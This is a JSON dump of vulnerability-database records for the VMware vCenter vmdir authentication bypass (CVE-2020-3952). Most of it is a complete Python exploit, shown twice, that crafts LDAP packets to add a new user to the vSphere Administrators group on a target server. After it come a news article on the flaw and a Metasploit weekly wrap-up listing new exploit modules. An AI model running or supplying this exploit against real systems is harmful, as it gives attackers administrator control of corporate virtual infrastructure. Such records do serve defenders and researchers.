getLengthPrefix(sPass, b'80') + sPass\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\n sPacket = b'020103' + sPacket\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\n sPacket = b'020101' + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return binascii.unhexlify(sPacket) \n\ndef buildUserCreatePacket(sUser, sPass):\n sUser = binascii.hexlify(sUser.encode())\n sPass = binascii.hexlify(sPass.encode())\n def createAttribute(sName, sValue):\n sValue = getLengthPrefix(sValue, b'04') + sValue\n sName = getLengthPrefix(sName, b'04') + sName\n \n sReturn = getLengthPrefix(sValue, b'31') + sValue\n sReturn = sName + sReturn\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\n return sReturn\n \n def createObjectClass():\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\n \n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\n return sReturn\n \n ## Attributes\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\n sAttributes += createObjectClass()\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\n ## CN\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\n \n ## Packet Assembly (bottom up)\n sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes\n sPacket = sUserEntry + sPacket\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return binascii.unhexlify(sPacket)\n\ndef buildModifyUserPacket(sUser):\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\n sMember = binascii.hexlify(b'member')\n ## Packet Construction\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\n #print(sPacket)\n return binascii.unhexlify(sPacket)\n\ndef performBind(s):\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\n dPacket = buildBindRequestPacket('[email\u00a0protected]','www.IC4.be')\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\n sCode = binascii.hexlify(sResponse).decode()\n if sCode == '31': print('[+] Ok, service reachable, continuing')\n else: print('[-] Something went wrong')\n except:\n pass\n return sCode\n\ndef performUserAdd(s, sUser, sPass):\n dPacket = buildUserCreatePacket(sUser,sPass)\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\n sMessage = sResponse.split(b'\\x04\\x00')[1]\n if sCode == b'\\x00':\n print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)\n elif sCode == b'\\x32':\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\n else:\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\n else: sMessage = sMessage[2:].decode()\n print('[-] Error, user not added, message received: ' + sMessage)\n except:\n pass\n return sCode\n \n\ndef performUserMod(s, sUser, verbose = True):\n dPacket = buildModifyUserPacket(sUser)\n s.send(dPacket)\n sResponse = s.recv(1024)\n try:\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\n sMessage = sResponse.split(b'\\x04\\x00')[1]\n if sCode == b'\\x00':\n if verbose: print('[+] User modification success (if the above is OK).')\n else:\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\n else: sMessage = sMessage[2:].decode()\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\n except:\n pass\n return sCode, sMessage\n\ndef performUnbind(s):\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\n except: pass\n\ndef main():\n global _sIP, _iPORT, _iTIMEOUT\n _sUSER = 'user_' + randomString(6)\n _sPASS = randomString(8) + '_2020'\n bAdduser = False\n if len(sys.argv) == 1:\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\n print(' Leave username & password empty for a vulnerability check')\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\n print(' But for now, I will ask questions')\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\n if not sAnswer == '': _sIP = sAnswer\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\n if sAnswer.lower() == 'n': bAdduser = True\n if bAdduser:\n sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')\n if not sAnswer == '': _sUSER = sAnswer\n sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')\n if not sAnswer == '': _sPASS = sAnswer\n else:\n _sIP = sys.argv[1]\n if len(sys.argv) >= 3:\n _sUSER = sys.argv[2]\n bAdduser = True\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\n\n ## MAIN\n print('')\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(_iTIMEOUT)\n try:\n s.connect((_sIP,_iPORT))\n except:\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\n sys.exit(1)\n\n performBind(s)\n\n if bAdduser:\n sCode = performUserAdd(s, _sUSER, _sPASS)\n\n if not bAdduser:\n print('[!] Checking vulnerability')\n sCode, sMessage = performUserMod(s, 'Administrator', False)\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\n else: print('[+] This host is vulnerable!')\n else:\n sCode = performUserMod(s, _sUSER)\n \n performUnbind(s)\n \n s.close()\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-06-03T02:50:14", "description": "", "published": "2020-06-02T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 6.7 Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-02T00:00:00", "id": "PACKETSTORM:157896", "href": "https://packetstormsecurity.com/files/157896/VMware-vCenter-Server-6.7-Authentication-Bypass.html", "sourceData": "`# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass \n# Date: 2020-06-01 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html \n# Version: vCenter Server 6.7 before update 3f \n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) \n# CVE: CVE-2020-3952 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2020 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nBased (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 \n \nFile name CVE-2020-3592.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \n## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: exploit + vulnerability checker \n''' \n \nimport binascii, socket, sys, string, random \n \n## Default vars; change at will \n_sIP = '192.168.50.35' \n_iPORT = 389 \n_iTIMEOUT = 5 \n \ndef randomString(iStringLength=8): \n#sLetters = string.ascii_lowercase \nsLetters = string.ascii_letters \nreturn ''.join(random.choice(sLetters) for i in range(iStringLength)) \n \ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified \n## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed \nsReturn = sPrefix \nif (len(sData) / 2 ) > 255: \nsReturn += b'82' \nhexBytes = 2 \nelif (len(sData) /2 ) >= 128: \nsReturn += b'81' \nsReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode() \nreturn sReturn \n \ndef buildBindRequestPacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \n## Packet Construction \nsPacket = getLengthPrefix(sPass, b'80') + sPass \nsPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket \nsPacket = b'020103' + sPacket \nsPacket = getLengthPrefix(sPacket, b'60') + sPacket \nsPacket = b'020101' + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildUserCreatePacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \ndef createAttribute(sName, sValue): \nsValue = getLengthPrefix(sValue, b'04') + sValue \nsName = getLengthPrefix(sName, b'04') + sName \n \nsReturn = getLengthPrefix(sValue, b'31') + sValue \nsReturn = sName + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \ndef createObjectClass(): \nsReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') \nsReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') \nsReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') \nsReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') \n \nsReturn = getLengthPrefix(sReturn, b'31') + sReturn \nsReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \n## Attributes \nsAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) \nsAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) \nsAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) \nsAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) \nsAttributes += createObjectClass() \nsAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) \n## CN \nsCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') \nsUserEntry = getLengthPrefix(sCN, b'04') + sCN \n \n## Packet Assembly (bottom up) \nsPacket = getLengthPrefix(sAttributes, b'30') + sAttributes \nsPacket = sUserEntry + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildModifyUserPacket(sUser): \nsFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) \nsCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') \nsMember = binascii.hexlify(b'member') \n## Packet Construction \nsPacket = getLengthPrefix(sFQDN, b'04') + sFQDN \nsPacket = getLengthPrefix(sPacket, b'31') + sPacket \nsPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket \nsPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010366') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef performBind(s): \n## Trying to bind, fails, but necessary (even fails when using correct credentials) \ndPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsResponse = sResponse.split(b'\\x04\\x00')[0][-1:] \nsCode = binascii.hexlify(sResponse).decode() \nif sCode == '31': print('[+] Ok, service reachable, continuing') \nelse: print('[-] Something went wrong') \nexcept: \npass \nreturn sCode \n \ndef performUserAdd(s, sUser, sPass): \ndPacket = buildUserCreatePacket(sUser,sPass) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nprint('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) \nelif sCode == b'\\x32': \nprint('[-] Error, this host is not vulnerable (insufficientAccessRights)') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nprint('[-] Error, user not added, message received: ' + sMessage) \nexcept: \npass \nreturn sCode \n \n \ndef performUserMod(s, sUser, verbose = True): \ndPacket = buildModifyUserPacket(sUser) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nif verbose: print('[+] User modification success (if the above is OK).') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nif verbose: print('[-] Error during modification, message received: ' + sMessage) \nexcept: \npass \nreturn sCode, sMessage \n \ndef performUnbind(s): \ntry: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00') \nexcept: pass \n \ndef main(): \nglobal _sIP, _iPORT, _iTIMEOUT \n_sUSER = 'user_' + randomString(6) \n_sPASS = randomString(8) + '_2020' \nbAdduser = False \nif len(sys.argv) == 1: \nprint('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') \nprint(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) \nprint(' Leave username & password empty for a vulnerability check') \nprint(' Watch out for vCenter/LDAP password requirements, leave empty for random password') \nprint(' But for now, I will ask questions') \nsAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') \nif not sAnswer == '': _sIP = sAnswer \nsAnswer = input('[?] Want to perform a check only? [Y/n]: ') \nif sAnswer.lower() == 'n': bAdduser = True \nif bAdduser: \nsAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') \nif not sAnswer == '': _sUSER = sAnswer \nsAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') \nif not sAnswer == '': _sPASS = sAnswer \nelse: \n_sIP = sys.argv[1] \nif len(sys.argv) >= 3: \n_sUSER = sys.argv[2] \nbAdduser = True \nif len(sys.argv) >= 4: _sPASS = sys.argv[3] \n \n## MAIN \nprint('') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(_iTIMEOUT) \ntry: \ns.connect((_sIP,_iPORT)) \nexcept: \nprint('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') \nsys.exit(1) \n \nperformBind(s) \n \nif bAdduser: \nsCode = performUserAdd(s, _sUSER, _sPASS) \n \nif not bAdduser: \nprint('[!] Checking vulnerability') \nsCode, sMessage = performUserMod(s, 'Administrator', False) \nif sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage) \nelse: print('[+] This host is vulnerable!') \nelse: \nsCode = performUserMod(s, _sUSER) \n \nperformUnbind(s) \n \ns.close() \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157896/vmwarevcenter67-bypass.txt"}], "threatpost": [{"lastseen": "2020-10-17T22:38:09", "description": "A critical information-disclosure bug in VMware\u2019s Directory Service (vmdir) could lay bare the contents of entire corporate virtual infrastructures, if exploited by cyberattackers.\n\nThe vmdir is part of VMware\u2019s vCenter Server product, which provides centralized management of virtualized hosts and virtual machines (VMs) from a single console. According to the [product description](<https://www.virtualizationworks.com/vCenter-Server.asp>), \u201ca single administrator can manage hundreds of workloads.\u201d\n\nThese workloads are governed by [a single sign-on (SSO) mechanism](<https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.install.doc/GUID-90C1E3DC-4397-4BF0-808E-DF3802E56BC6.html>) to make things easier for administrators; rather than having to sign into each host or VM with separate credentials in order to gain visibility to it, one authentication mechanism works across the entire management console.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vmdir in turn is a central component to the vCenter SSO (along with the Security Token Service, an administration server and vCenter Lookup Service). Also, vmdir is used for certificate management for the workloads governed by vCenter, according to VMware.\n\nThe critical flaw ([CVE-2020-3952](<https://www.vmware.com/security/advisories/VMSA-2020-0006.html>)) was disclosed and patched on Thursday; it rates 10 out of 10 on the CVSS v.3 vulnerability severity scale. At issue is a poorly implemented access control, according to the bug advisory, which could allow a malicious actor to bypass authentication mechanisms.\n\n\u201cUnder certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls,\u201d the description explained.\n\nAs for the attack vector, \u201ca malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information,\u201d VMware noted. In turn, this information could be used to compromise the vCenter Server itself \u201cor other services which are dependent upon vmdir for authentication.\u201d\n\nThere are no workarounds, but administrators are encouraged to apply the patches as soon as possible.\n\nvCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected, according to the company. To help administrators find out if their vmdir deployments are affected by CVE-2020-3952, the vendor has published a [how-to knowledge base document](<https://kb.vmware.com/s/article/78543>).\n\n\u201cVMware, one of, if not the most, [popular virtualization software companies in the world](<https://threatpost.com/hackers-take-down-safari-vmware-and-oracle-at-pwn2own/143042/>), recently patched an extremely critical information disclosure vulnerability\u2026one of the most severe vulnerabilities that has affected VMware software,\u201d Chris Hass, director of information security and research at Automox, told Threatpost. \u201cvCenter Server provides a centralized platform for controlling VMware vSphere environments, it helps manage virtual infrastructure in a tremendous number of hybrid clouds, so the scope and impact of this vulnerability is quite large. Organizations using vCenter need to check their vmdir logs for affected versions, ACL MODE: legacy, and patch immediately.\u201d\n\nNo specific acknowledgments were given for the bug discovery \u2013 VMware noted only that it was \u201cdisclosed privately.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-10T17:19:57", "type": "threatpost", "title": "Critical VMware Bug Opens Up Corporate Treasure to Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0215", "CVE-2020-0416", "CVE-2020-3952"], "modified": "2020-04-10T17:19:57", "id": "THREATPOST:D3B948D7FFB688A6022FF02F81F830F7", "href": "https://threatpost.com/critical-vmware-bug-corporate-treasure-hackers/154682/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-20T01:27:23", "description": "## Log4Shell goodness\n\n\n\nLog4Shell made an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors [sempervictus](<https://github.com/sempervictus>), [schierlm](<https://github.com/schierlm>), [righel](<https://github.com/righel>), [timwr](<https://github.com/timwr>) and our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.\n\n## SonicWall SSL VPN module for Rapid7-discovered vulnerability\n\nRapid7 disclosed the technical details of [five vulnerabilities](<https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/>) discovered by [jbaines-r7](<https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/%E2%80%8B%E2%80%8Bhttps://github.com/jbaines-r7>) affecting SonicWall\u2019s SMA-100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives remote and authenticated attackers `root` access to the device using CVE-2021-20039.\n\n## Pi-Hole command execution and common exploit library\n\nAn exciting new addition has worked its way into Metasploit Framework this week. Contributor [h00die](<https://github.com/h00die>) has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole\u2019s Top Domains API\u2019s `validDomainWildcard` field. H00die has also created a library that aims to make developing future Pi-Hole modules easier.\n\n## New module content (4)\n\n * [Pi-Hole Top Domains API Authenticated Exec](<https://github.com/rapid7/metasploit-framework/pull/16012>) by SchneiderSec and h00die, which exploits [CVE-2021-32706](<https://attackerkb.com/topics/4c25C9i2U2/cve-2021-32706?referrer=blog>) \\- This adds an auxiliary module that executes commands against Pi-Hole versions &lt;= `5.5`. This also introduces a Pi-Hole library for common functionality required in exploits against the service.\n * [SonicWall SMA 100 Series Authenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16041>) by jbaines-r7, which exploits [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039?referrer=blog>) \\- This adds a module that exploits an authenticated command injection vulnerability in multiple versions of the SonicWALL SMA 100 series web interface. In the SSL certificate deletion functionality, the sanitization logic permits the `\\n` character which acts as a terminator when passed to a call to `system()`. An authenticated attacker can execute arbitrary commands as the `root` user.\n * [Log4Shell HTTP Header Injection](<https://github.com/rapid7/metasploit-framework/pull/15969>) by sinn3r, juan vazquez, Michael Schierl, RageLtMan, and Spencer McIntyre, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \\- This adds an exploit for HTTP servers that are affected by the Log4J/Log4Shell vulnerability via header stuffing.\n * [Microsoft Windows SMB Direct Session Takeover](<https://github.com/rapid7/metasploit-framework/pull/15903>) by usiegl00 - This adds a new exploit module that implements the Shadow Attack, SMB Direct Session takeover. Before running this module, a MiTM attack needs to be performed to let it intercept SMB authentication requests between a client and a server. by using any kind of ARP spoofer/poisoner tools in addition to Metasploit. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.\n\n## Enhancements and features\n\n * [#15656](<https://github.com/rapid7/metasploit-framework/pull/15656>) from [HynekPetrak](<https://github.com/HynekPetrak>) \\- This enables the `vmware_vcenter_vmdir_auth_bypass` module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.\n * [#16021](<https://github.com/rapid7/metasploit-framework/pull/16021>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds additional tests for Meterpreter's mkdir/rmdir functionality to ensure uniform implementations across all Meterpreters\n * [#16024](<https://github.com/rapid7/metasploit-framework/pull/16024>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds in a new command to Meterpreter that allows the end user to kill all channels at once\n * [#16040](<https://github.com/rapid7/metasploit-framework/pull/16040>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Removes Ruby 2.5 support as it is officially end of life\n * [#12217](<https://github.com/rapid7/metasploit-framework/pull/12217>) from [SkypLabs](<https://github.com/SkypLabs>) \\- This adds the f5 load balancer cookie to notes, and cleans up the module (rubocop/documentation/refs)\n\n## Bugs fixed\n\n * [#16016](<https://github.com/rapid7/metasploit-framework/pull/16016>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This fixes an issue in the `auxiliary/scanner/dcerpc/hidden` module where the `RHOSTS` datastore option was not available, resulting in hosts not being scanned.\n * [#16027](<https://github.com/rapid7/metasploit-framework/pull/16027>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an issue with tab completion for the `generate` command. Completion now works with both the `-f` and `-o` flags.\n * [#16043](<https://github.com/rapid7/metasploit-framework/pull/16043>) from [shoxxdj](<https://github.com/shoxxdj>) \\- Fixes crash in the `auxiliary/scanner/http/wordpress_scanner.rb` module when attempting to scan themes\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-01-06T10%3A44%3A33-06%3A00..2022-01-13T13%3A35%3A39-06%3A00%22>)\n * [Full diff 6.1.23...6.1.25](<https://github.com/rapid7/metasploit-framework/compare/6.1.23...6.1.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T19:00:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952", "CVE-2021-20038", "CVE-2021-20039", "CVE-2021-32706", "CVE-2021-44228"], "modified": "2022-01-14T19:00:29", "id": "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "href": "https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}